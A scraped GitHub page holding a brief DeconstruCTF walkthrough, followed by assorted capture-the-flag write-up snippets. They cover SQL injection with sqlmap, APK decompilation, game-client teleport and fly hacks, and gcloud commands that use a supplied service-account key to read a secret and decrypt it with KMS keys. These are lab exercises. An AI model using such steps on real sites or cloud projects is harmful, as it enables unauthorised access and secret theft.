<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/deepakdhayal/DeconstruCTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div>
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>Master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/deepakdhayal/DeconstruCTF/refs" cache-key="v0:1633153604.597844" current-committish="TWFzdGVy" default-branch="TWFzdGVy" name-with-owner="ZGVlcGFrZGhheWFsL0RlY29uc3RydUNURg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/deepakdhayal/DeconstruCTF/refs" cache-key="v0:1633153604.597844" current-committish="TWFzdGVy" default-branch="TWFzdGVy" name-with-owner="ZGVlcGFrZGhheWFsL0RlY29uc3RydUNURg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>DeconstruCTF</span></span></span><span>/</span>WalkThrough.md </h2> Go to file
<details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg>
</summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span>
</button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="WalkThrough.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/deepakdhayal/DeconstruCTF/blob/3c6a6b741bbeb327bf484529d6dfcb4acda3fd24/WalkThrough.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details> </div>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/deepakdhayal/DeconstruCTF/contributors/Master/WalkThrough.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment> </div>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" >
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
89 lines (48 sloc) <span></span> 3.39 KB </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg>
</div>
<div class="BtnGroup"> Raw
Blame
</div>
<div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path></svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path></svg> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> </summary>
Open with Desktop View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg>DeconstruCTF</h1>WalkThroughThis is my First Time writting a walkthrough. There can be mistakes. Suggestions are Welcomed.##Piratesopen file in wireshark.network_listen.pcap.zipFollow TCP stream.##The Missing JournalistFile can be downloaded here.the_journalist.gif.zipExtract the file.Using foremost tool, you can see another PDF.using Exiftool you can see a base64 string which is used as password for the last pdf.##Taxi Union ProblemsThere is only one input field in the website.2.If we put an (') in the field we can see an error. Its an SQL injection. Sql Injection Verified.Intercept the request in burpsuit.copy the request and save it in a file and use SQLmap.Location is being displayed in the last image. Use the hint no caps.##RSA - 1##RSA - 2##ScrapsBase64 Decode##Failed LoginsMy approach might not be correct but it worked in this case.1.Rename the apk file:::: using ---mv chall.apk chall.zipd2j-dex2jar -d chall.zipjd-gui chall-dex2jar.jar</article> </div>
WalkThroughThis is my First Time writting a walkthrough. There can be mistakes. Suggestions are Welcomed.
##Pirates
##The Missing Journalist
##Taxi Union Problems
2.If we put an (') in the field we can see an error. Its an SQL injection. Sql Injection Verified.
##RSA - 1
##RSA - 2
##Scraps
Base64 Decode
##Failed LoginsMy approach might not be correct but it worked in this case.
1.Rename the apk file:::: using ---mv chall.apk chall.zip
d2j-dex2jar -d chall.zip
jd-gui chall-dex2jar.jar
</div>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go
</button></form> </details-dialog> </details>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
A non mathematical crypto challenge, where we need to understand the challenge instruction scenario and also go as we uncover step by step to obtain the final flag. Detailed writeup available in original writeup below. |
Modifying the conch client-side info, you can get discrete distances as well as your current 3d point location. Using this info, you can get relativley close to the bunny then create a small triangle around it (sampling points). Sample 3 points, then use any triangulation algorithm. We used intersection of three spheres. After getting the exact point of the bunny, you must teleport there. Modify the client `update_player` code to allow for tp.
Full writeup: [https://mahaloz.re/tasteless-21-tasteless-shores/#tp-hacks-challenge-conch](https://mahaloz.re/tasteless-21-tasteless-shores/#tp-hacks-challenge-conch)
|
Using the game logic in sir_brush you can create an 8 backwards chain lookup for 8 observations that gives you an 50% chance of getting a seed (x,y,z) that can generate a full sequence of arbitrary length.
Full writeup: [https://mahaloz.re/tasteless-21-tasteless-shores/#rng-hacks-challenge-thrybrush](https://mahaloz.re/tasteless-21-tasteless-shores/#rng-hacks-challenge-thrybrush) |
This was in the cloud section and was a service account key json.
The first thing I did after downloading the json was to have a look at it, which told me the name of the project it was associated with. I could then authenticate with gcloud as that service account and configure that project.
```gcloud config set project ductf-lost-n-foundgcloud auth activate-service-account --key-file legacy.json```
This meant that I could use gcloud to have a poke around the resources in the project that the service account had access to. Most of the APIs in the project weren't enabled, but the Google Secrets one was, and the service account had access. I listed the secrets present in the project:
```gcloud secrets list```
which revealed a secret called unused_data. I then listed the versions of the secret. There was only one version so I downloaded that. It was base64 encoded so I decoded it and read it into a local file:
```gcloud secrets versions list unused_datagcloud secrets versions access 1 --secret=unused_data | base64 --decode > output```
I had a look at the output but it was a binary, not a flag. It's good practice to encrypt secrets, so I wondered if potentially this secret was encrypted with a Google KMS key. I listed the KMS keyrings and keys available in the project, making a guess that an Australian CTF would be using Australian regions:
```gcloud kms keyrings list --location australia-southeast1 # nothinggcloud kms keyrings list --location australia-southeast2 # a keyring called wardens-locksgcloud kms keys list --location australia-southeast2 --keyring wardens-locks```
Listing the keys on the keyring revealed 10 or so keys associated with it. There wasn't an obvious key to try first so I went through them all, attempting to decrypt the secret I'd found with them:
```gcloud kms decrypt --ciphertext-file output --plaintext-file flag --location australia-southeast2 --keyring wardens-locks --key a-silver-key```
Eventually I found the right key and got the flag! |
After discovering this challenge is GDScript, you can decompile to it and recompile it. Modify the client to give you speed, jump, and fly hacks. Make sure you update `player.markers` to have the `FLAG_BOAT` in it so you can trigger the chest to give you the flag. Lastly, walk over to the chest and get it.
